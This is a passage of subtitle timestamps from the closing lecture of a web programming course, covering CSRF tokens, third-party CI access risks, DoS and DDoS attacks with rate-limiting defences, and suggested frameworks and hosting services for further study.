a password, 1638 01:13:30,390 --> 01:13:32,850 that is associated with this specific form. 1639 01:13:32,850 --> 01:13:35,220 Such that when the user submits that form, 1640 01:13:35,220 --> 01:13:37,140 the token is submitted along with it. 1641 01:13:37,140 --> 01:13:40,200 And the server can then check to see does this token match 1642 01:13:40,200 --> 01:13:41,700 the token that I initially sent out. 1643 01:13:41,700 --> 01:13:44,460 And only, if and only if they match, then we're 1644 01:13:44,460 --> 01:13:46,290 going to actually initiate the transfer. 1645 01:13:46,290 --> 01:13:50,880 That way, no other website is able to forge a request to my bank's transfer 1646 01:13:50,880 --> 01:13:53,610 web site because they're not going to know what the token is. 1647 01:13:53,610 --> 01:13:56,070 It's going to be a new token every time we make a request, 1648 01:13:56,070 --> 01:14:01,080 and that's going to allow us to avoid a situation where someone might be able 1649 01:14:01,080 --> 01:14:02,670 to-- from some other site-- 1650 01:14:02,670 --> 01:14:08,520 make a request that attacks the /transfer route in this case. 1651 01:14:08,520 --> 01:14:11,112 So that's why Django has that CSRF token in place. 1652 01:14:11,112 --> 01:14:13,070 It's to prevent against those kinds of attacks. 1653 01:14:13,070 --> 01:14:16,350 Flask on its own doesn't, by default, have this sort of protection built in, 1654 01:14:16,350 --> 01:14:19,830 although there are extensions that allow you to add on to a Flask 1655 01:14:19,830 --> 01:14:24,120 in order to help add security for this particular type of attack 1656 01:14:24,120 --> 01:14:25,607 into Flask as well. 1657 01:14:25,607 --> 01:14:27,690 So these are also just good things to be aware of, 1658 01:14:27,690 --> 01:14:29,795 potential security vulnerabilities that can exist, 1659 01:14:29,795 --> 01:14:32,670 and things you'll want to think about as you design your application. 1660 01:14:32,670 --> 01:14:36,660 Can just anyone initiate a transfer request by submitting a POST request 1661 01:14:36,660 --> 01:14:39,570 or do they need some special tokens, potentially changing, 1662 01:14:39,570 --> 01:14:42,670 as they go about doing that as well. 1663 01:14:42,670 --> 01:14:44,843 Questions about the security vulnerabilities 1664 01:14:44,843 --> 01:14:48,300 we've talked about so far? 1665 01:14:48,300 --> 01:14:48,970 OK. 1666 01:14:48,970 --> 01:14:53,140 Let's go ahead and move on from Django and talk a little bit about CI/CD. 1667 01:14:53,140 --> 01:14:55,090 And so this is relatively recent, where we 1668 01:14:55,090 --> 01:14:58,690 were talking about how we might leverage CI tools, 1669 01:14:58,690 --> 01:15:01,210 where we looked at Travis in particular, as a tool that we 1670 01:15:01,210 --> 01:15:04,630 can use in order to run tests in order to deploy our code. 1671 01:15:04,630 --> 01:15:07,060 And we connected Travis to GitHub, whereby 1672 01:15:07,060 --> 01:15:11,200 Travis was able to run tests on our GitHub code inside of our repositories 1673 01:15:11,200 --> 01:15:14,680 and then check to make sure that those tests, in fact, passed. 1674 01:15:14,680 --> 01:15:17,770 What vulnerabilities appear there? 1675 01:15:17,770 --> 01:15:20,030 Or are things that we should be considering 1676 01:15:20,030 --> 01:15:21,620 when we start to think about that? 1677 01:15:21,620 --> 01:15:22,120 Yeah? 1678 01:15:22,120 --> 01:15:24,430 AUDIENCE: You're giving Travis access to your codebase. 1679 01:15:24,430 --> 01:15:25,060 BRIAN YU: Yeah, exactly. 1680 01:15:25,060 --> 01:15:27,230 We're now giving Travis access to our codebase. 1681 01:15:27,230 --> 01:15:31,280 So whereas before, our code was stored on GitHub and GitHub alone, 1682 01:15:31,280 --> 01:15:33,280 such that, certainly, if GitHub was compromised, 1683 01:15:33,280 --> 01:15:35,480 now our code is compromised as well. 1684 01:15:35,480 --> 01:15:39,310 Now we've given Travis access to all of our private repositories 1685 01:15:39,310 --> 01:15:41,620 on GitHub potentially, such that now there 1686 01:15:41,620 --> 01:15:43,609 are two points at which being compromised 1687 01:15:43,609 --> 01:15:45,400 could result in our code being compromised. 1688 01:15:45,400 --> 01:15:48,280 Whereby if GitHub is compromised, our code is compromised. 1689 01:15:48,280 --> 01:15:51,281 But likewise, if Travis is compromised for some security reason, 1690 01:15:51,281 --> 01:15:53,530 then our code might also be compromised because Travis 1691 01:15:53,530 --> 01:15:56,260 has access to our GitHub account. 1692 01:15:56,260 --> 01:15:58,540 And so any time you deal with accounts that 1693 01:15:58,540 --> 01:16:02,319 are able to grant permission to other applications or other accounts 1694 01:16:02,319 --> 01:16:05,110 to get access to that information, that's where there's potentially 1695 01:16:05,110 --> 01:16:06,860 room for security vulnerabilities. 1696 01:16:06,860 --> 01:16:09,120 And so we see that with GitHub, where GitHub 1697 01:16:09,120 --> 01:16:11,680 is allowed to authorize other applications if you give them 1698 01:16:11,680 --> 01:16:14,080 permission to have access to your information as well. 1699 01:16:14,080 --> 01:16:15,871 But you see this in other websites as well. 1700 01:16:15,871 --> 01:16:18,850 In fact, Facebook does this, and been under controversy recently, 1701 01:16:18,850 --> 01:16:23,470 for the idea that it can grant third party applications the right 1702 01:16:23,470 --> 01:16:25,120 to look at your user information. 1703 01:16:25,120 --> 01:16:27,370 And if you grant a third party application that right, 1704 01:16:27,370 --> 01:16:30,190 now if any one of those is compromised, then your own user information 1705 01:16:30,190 --> 01:16:30,815 is compromised. 1706 01:16:30,815 --> 01:16:32,890 And so it's the same type of thing, where 1707 01:16:32,890 --> 01:16:37,120 you want to be careful about if you're giving access to one website, 1708 01:16:37,120 --> 01:16:39,460 giving one website access to your user information 1709 01:16:39,460 --> 01:16:44,050 or your code and your repositories, then what other services also 1710 01:16:44,050 --> 01:16:46,641 have the same access to that information as well. 1711 01:16:46,641 --> 01:16:48,640 And so if you're the one designing the services, 1712 01:16:48,640 --> 01:16:51,820 you want to be careful about what other services you give access to. 1713 01:16:51,820 --> 01:16:53,710 And if you're the one using GitHub or Travis, 1714 01:16:53,710 --> 01:16:56,980 you also want to be careful about how many different third party 1715 01:16:56,980 --> 01:17:02,670 services have access to all of your private repositories for example. 1716 01:17:02,670 --> 01:17:05,860 And so as a final example, as we move on to, just recently 1717 01:17:05,860 --> 01:17:08,200 last week, in terms of the topics we were talking about, 1718 01:17:08,200 --> 01:17:11,050 we talked a little bit about scalability and the idea 1719 01:17:11,050 --> 01:17:13,960 that once we've written our application and we're ready to deploy it, 1720 01:17:13,960 --> 01:17:17,417 we need to think about how we're going to scale this application as more 1721 01:17:17,417 --> 01:17:19,000 and more users start working about it. 1722 01:17:19,000 --> 01:17:22,600 We talked about load balancers and having multiple, different servers. 1723 01:17:22,600 --> 01:17:26,050 And we talked about, in particular, that any server 1724 01:17:26,050 --> 01:17:29,984 is a finite machine that can only handle a certain number of requests 1725 01:17:29,984 --> 01:17:31,150 in a certain amount of time. 1726 01:17:31,150 --> 01:17:34,720 Maybe x requests per second for instance, where x is some number. 1727 01:17:34,720 --> 01:17:39,160 And what potential vulnerabilities or exploits come about there? 1728 01:17:39,160 --> 01:17:41,140 What could a potentially malicious hacker 1729 01:17:41,140 --> 01:17:46,184 try to do knowing the constraints of what our systems are capable of? 1730 01:17:46,184 --> 01:17:50,056 AUDIENCE: Like [INAUDIBLE] can start DDoSing your system, 1731 01:17:50,056 --> 01:17:52,000 sending a bunch of requests at the same time. 1732 01:17:52,000 --> 01:17:52,480 BRIAN YU: Exactly. 1733 01:17:52,480 --> 01:17:53,646 Sending a bunch of requests. 1734 01:17:53,646 --> 01:17:57,620 So if a computer, for instance, is going to-- if our server, for instance, 1735 01:17:57,620 --> 01:18:02,046 can only handle 1,000 requests per second, and one hacker, 1736 01:18:02,046 --> 01:18:05,170 on their computer, decides that they want to try and shut down our system-- 1737 01:18:05,170 --> 01:18:07,840 maybe they're going to send 1,001 request in a single second 1738 01:18:07,840 --> 01:18:08,800 to our server. 1739 01:18:08,800 --> 01:18:12,895 And this is what we'll generally call a DoS, or denial-of-service attack, 1740 01:18:12,895 --> 01:18:17,440 where a user tries to send a request after request after request 1741 01:18:17,440 --> 01:18:19,390 in an attempt to overload our servers in order 1742 01:18:19,390 --> 01:18:22,330 to try and make sure that we're unable to handle all the requests that 1743 01:18:22,330 --> 01:18:22,913 are coming in. 1744 01:18:22,913 --> 01:18:26,070 And if we're handling all of the requests coming in from one user, 1745 01:18:26,070 --> 01:18:29,080 then we're potentially not able to handle requests 1746 01:18:29,080 --> 01:18:31,900 coming from other people as well. 1747 01:18:31,900 --> 01:18:34,450 Of course, this probably isn't too much of an issue 1748 01:18:34,450 --> 01:18:38,050 if we've got dozens and dozens of servers 1749 01:18:38,050 --> 01:18:41,020 and only one computer is the one making a lot of requests. 1750 01:18:41,020 --> 01:18:42,790 Which is why the next thing you mentioned 1751 01:18:42,790 --> 01:18:45,950 was also a potential exploit or a potential concern, 1752 01:18:45,950 --> 01:18:50,140 which is that what if it's not just one, single computer, but a whole botnet 1753 01:18:50,140 --> 01:18:54,550 of a bunch of computers that are all trying to make requests to the same web 1754 01:18:54,550 --> 01:18:55,900 server at the same time? 1755 01:18:55,900 --> 01:18:57,820 This is what we generally call a DDoS attack, 1756 01:18:57,820 --> 01:18:59,980 a Distributed denial-of-service attack, where 1757 01:18:59,980 --> 01:19:01,840 we have a lot of different computers that 1758 01:19:01,840 --> 01:19:05,510 are all trying to make requests at the same time to our same web application. 1759 01:19:05,510 --> 01:19:07,990 And as a result, it's quite likely that the web application 1760 01:19:07,990 --> 01:19:11,120 might be overloaded by all these requests and be unable to handle it. 1761 01:19:11,120 --> 01:19:15,037 And so what are ways of potentially dealing with a DDoS attack? 1762 01:19:15,037 --> 01:19:17,620 Of a bunch of people trying to make requests at the same time, 1763 01:19:17,620 --> 01:19:22,071 trying to shut down our server by overloading it with too many requests? 1764 01:19:22,071 --> 01:19:22,570 Yeah. 1765 01:19:22,570 --> 01:19:24,400 AUDIENCE: Limit how many requests they can make. 1766 01:19:24,400 --> 01:19:25,790 BRIAN YU: Try and limit how many requests they can make. 1767 01:19:25,790 --> 01:19:27,760 So certainly one potential approach to dealing 1768 01:19:27,760 --> 01:19:31,540 with DDoS attacks is to try and add some sort of filtering system of trying 1769 01:19:31,540 --> 01:19:34,470 to-- before it actually gets to the server, try and filter and see 1770 01:19:34,470 --> 01:19:35,770 is this a valid request or not? 1771 01:19:35,770 --> 01:19:37,965 And maybe there are heuristics you can use for that. 1772 01:19:37,965 --> 01:19:40,090 And certainly, if you can limit people, that if you 1773 01:19:40,090 --> 01:19:43,540 notice that this particular computer is making a lot of requests 1774 01:19:43,540 --> 01:19:45,880 at the same time or in a short amount of time, then 1775 01:19:45,880 --> 01:19:47,671 maybe you can put downward pressure on that 1776 01:19:47,671 --> 01:19:49,380 by blacklisting that particular user. 1777 01:19:49,380 --> 01:19:51,550 So that's certainly something we could think about as well. 1778 01:19:51,550 --> 01:19:53,466 But in the end of things, it really often does 1779 01:19:53,466 --> 01:19:56,340 come down to just a battle of resources, of who has more resources. 1780 01:19:56,340 --> 01:19:58,810 Is it the adversary or is it yourself? 1781 01:19:58,810 --> 01:20:01,186 And so oftentimes this is not something that you can just 1782 01:20:01,186 --> 01:20:03,185 deal with at the web application level, but it's 1783 01:20:03,185 --> 01:20:06,390 something that needs to be dealt with at the server level or the ISP level. 1784 01:20:06,390 --> 01:20:08,280 Where you really need to make sure that your infrastructure is 1785 01:20:08,280 --> 01:20:11,550 in place, especially if you're dealing with a large web application, 1786 01:20:11,550 --> 01:20:15,360 to make sure that you're able to handle all of that potential traffic. 1787 01:20:15,360 --> 01:20:18,450 And so certainly, the end idea of this and of all the topics 1788 01:20:18,450 --> 01:20:21,420 we've talked about so far today is that through all of the things 1789 01:20:21,420 --> 01:20:24,590 we've talked about, whether it was just a simple, static HTML web page 1790 01:20:24,590 --> 01:20:28,170 or dealing with scalability and Flask and Django and other web services, 1791 01:20:28,170 --> 01:20:31,710 or JavaScript and how we might be able to inject JavaScript code into our web 1792 01:20:31,710 --> 01:20:35,070 application, there are security vulnerabilities everywhere. 1793 01:20:35,070 --> 01:20:37,170 And it's definitely a good idea to be thinking 1794 01:20:37,170 --> 01:20:39,300 about what those vulnerabilities might be 1795 01:20:39,300 --> 01:20:42,840 and how we might be able to deal with them when they arrive. 1796 01:20:42,840 --> 01:20:47,190 And so now let's think about moving beyond just this course 1797 01:20:47,190 --> 01:20:49,440 as we arrive at the conclusion of the course. 1798 01:20:49,440 --> 01:20:50,400 What comes next? 1799 01:20:50,400 --> 01:20:52,020 If this is still something that interests you, 1800 01:20:52,020 --> 01:20:53,370 if web programming is something that you're 1801 01:20:53,370 --> 01:20:55,291 interested in continuing to learn more about, 1802 01:20:55,291 --> 01:20:57,540 we were just really barely scratching the surface here 1803 01:20:57,540 --> 01:21:00,180 when it came to programming with Python and JavaScript. 1804 01:21:00,180 --> 01:21:04,170 We looked at Flask and Django in particular as the web frameworks 1805 01:21:04,170 --> 01:21:07,230 that we were using in order to build and design and deploy our websites. 1806 01:21:07,230 --> 01:21:09,800 But those certainly are not the only options. 1807 01:21:09,800 --> 01:21:12,304 There are other web frameworks that are gaining popularity 1808 01:21:12,304 --> 01:21:14,220 in modern times, nowadays, that are definitely 1809 01:21:14,220 --> 01:21:17,011 worth looking into if this is the sort of thing that interests you. 1810 01:21:17,011 --> 01:21:20,100 Generally, we can divide them into server-side frameworks, 1811 01:21:20,100 --> 01:21:23,130 the sort of frameworks that are going to be running like Flask or Django 1812 01:21:23,130 --> 01:21:28,500 on our web server somewhere, where Express.js and Ruby on Rails 1813 01:21:28,500 --> 01:21:31,420 are examples of some server-side frameworks that we'll commonly use. 1814 01:21:31,420 --> 01:21:32,086 Actually, sorry. 1815 01:21:32,086 --> 01:21:35,010 This is mislocated a little bit. 1816 01:21:35,010 --> 01:21:38,794 And client-side frameworks include things like React or Angular 1817 01:21:38,794 --> 01:21:41,460 that are common frameworks that are used on the client-side now, 1818 01:21:41,460 --> 01:21:44,460 in order to generate components that are displayed 1819 01:21:44,460 --> 01:21:47,630 that are able to interact with the web server in some way. 1820 01:21:47,630 --> 01:21:50,140 And so these are definitely things to look at as well. 1821 01:21:50,140 --> 01:21:53,019 And then when it comes to actually taking your web application 1822 01:21:53,019 --> 01:21:54,810 and deploying it to the internet, if that's 1823 01:21:54,810 --> 01:21:56,880 something that's of interest to you as well, 1824 01:21:56,880 --> 01:21:58,740 there are a whole number of other services 1825 01:21:58,740 --> 01:22:00,156 that you can use as well for that. 1826 01:22:00,156 --> 01:22:02,100 So GitHub Pages was one that we looked at way 1827 01:22:02,100 --> 01:22:04,391 at the very beginning of the course, which is generally 1828 01:22:04,391 --> 01:22:08,250 used if we just want to deploy some static content to a page like HTML 1829 01:22:08,250 --> 01:22:09,540 and CSS and JavaScript. 1830 01:22:09,540 --> 01:22:11,269 And that's totally fine for GitHub Pages. 1831 01:22:11,269 --> 01:22:14,310 But if we want to run a web server, we're going to need a little bit more 1832 01:22:14,310 --> 01:22:15,160 than that. 1833 01:22:15,160 --> 01:22:17,280 And so we did look a little bit at Heroku 1834 01:22:17,280 --> 01:22:19,310 when we were thinking about using our database. 1835 01:22:19,310 --> 01:22:23,370 So Heroku is a service that allows us to host web applications on the internet. 1836 01:22:23,370 --> 01:22:26,400 It makes it relatively easy to take a Flask or Django web application 1837 01:22:26,400 --> 01:22:27,252 and host it. 1838 01:22:27,252 --> 01:22:30,210 And in particular, it makes it very easy to hook that up to a database, 1839 01:22:30,210 --> 01:22:33,150 for instance, in order to connect it with a PostgreSQL database, 1840 01:22:33,150 --> 01:22:35,400 as we did in one of the early projects in order 1841 01:22:35,400 --> 01:22:37,560 to allow us to deploy that as well. 1842 01:22:37,560 --> 01:22:41,580 But if you're looking for even more power and even more feature-filled web 1843 01:22:41,580 --> 01:22:44,910 hosting than that, you can take a look at Amazon Web Services or Google Cloud 1844 01:22:44,910 --> 01:22:48,360 or Microsoft Azure, all of which offer a lot of different services 1845 01:22:48,360 --> 01:22:51,300 for taking web applications and deploying them to the internet. 1846 01:22:51,300 --> 01:22:53,841 They often will use Docker, which we looked at a little while 1847 01:22:53,841 --> 01:22:56,790 back when we were talking about containerizing our application 1848 01:22:56,790 --> 01:22:59,820 and bundling together our web application with the database 1849 01:22:59,820 --> 01:23:03,000 and any other services that might be involved in running that application. 1850 01:23:03,000 --> 01:23:04,860 And so certainly these are services that you 1851 01:23:04,860 --> 01:23:07,680 can use as well if you're thinking about actually building out 1852 01:23:07,680 --> 01:23:10,350 one of these web applications and deploying it to the internet. 1853 01:23:10,350 --> 01:23:13,560 And these larger services like AWS or Microsoft Azure, 1854 01:23:13,560 --> 01:23:16,786 they have the ability to take care of some of the scalability concerns 1855 01:23:16,786 --> 01:23:17,910 that we were talking about. 1856 01:23:17,910 --> 01:23:20,310 The ability to add load balancers that are 1857 01:23:20,310 --> 01:23:23,212 able to make sure that we have enough servers 1858 01:23:23,212 --> 01:23:25,920 to make sure that we're able to handle all the requests coming in 1859 01:23:25,920 --> 01:23:27,210 from all the different users. 1860 01:23:27,210 --> 01:23:29,700 And they do auto scaling such that as more users come in, 1861 01:23:29,700 --> 01:23:33,130 we can increase the number of servers or decrease the number of servers as well. 1862 01:23:33,130 --> 01:23:36,600 And so these are increasingly popular tools and technologies 1863 01:23:36,600 --> 01:23:39,780 that are ways of allowing people to take web applications that they're 1864 01:23:39,780 --> 01:23:44,010 building on their own computers and ultimately deploy them to the internet. 1865 01:23:44,010 --> 01:23:46,586 Before we wrap up, I just want to make sure to say thank you 1866 01:23:46,586 --> 01:23:48,960 to all the people that were really instrumental in making 1867 01:23:48,960 --> 01:23:50,040 the course possible. 1868 01:23:50,040 --> 01:23:53,060 To David, my co-instructor, who unfortunately couldn't be here today. 1869 01:23:53,060 --> 01:23:56,207 But also to our great teaching fellows, Anushree and Elle and Rodrigo 1870 01:23:56,207 --> 01:23:58,290 and Sebastian and Jessica for running the course's 1871 01:23:58,290 --> 01:24:00,210 office hours in the course's sections. 1872 01:24:00,210 --> 01:24:03,360 And of course, the CS50's production team, Ramon and Andrew 1873 01:24:03,360 --> 01:24:06,450 and Max and Meredith and Ian and Scully and Dan and Arturo 1874 01:24:06,450 --> 01:24:09,180 for making the lectures possible and the lecture videos possible. 1875 01:24:09,180 --> 01:24:10,230 Thank you to you all. 1876 01:24:10,230 --> 01:24:13,560 And of course, finally, thank you to all of you for joining us in this course, 1877 01:24:13,560 --> 01:24:16,230 for learning about web programming with Python and JavaScript. 1878 01:24:16,230 --> 01:24:17,160 Hope you enjoyed it. 1879 01:24:17,160 --> 01:24:20,070 Hope you got an opportunity to work on some hands-on projects that 1880 01:24:20,070 --> 01:24:22,890 were exciting and ultimately showed you the power and capacity 1881 01:24:22,890 --> 01:24:26,100 that Python and JavaScript have for building really dynamic and really 1882 01:24:26,100 --> 01:24:27,840 interesting web applications. 1883 01:24:27,840 --> 01:24:31,029 Can't wait to see what you guys continue to do with your final projects. 1884 01:24:31,029 --> 01:24:33,570 But that's it for web programming with Python and JavaScript, 1885 01:24:33,570 --> 01:24:35,640 so thank you all so much. 1886 01:24:35,640 --> 01:24:39,890 [APPLAUSE] 1887 01:24:39,890 --> 01:24:40,641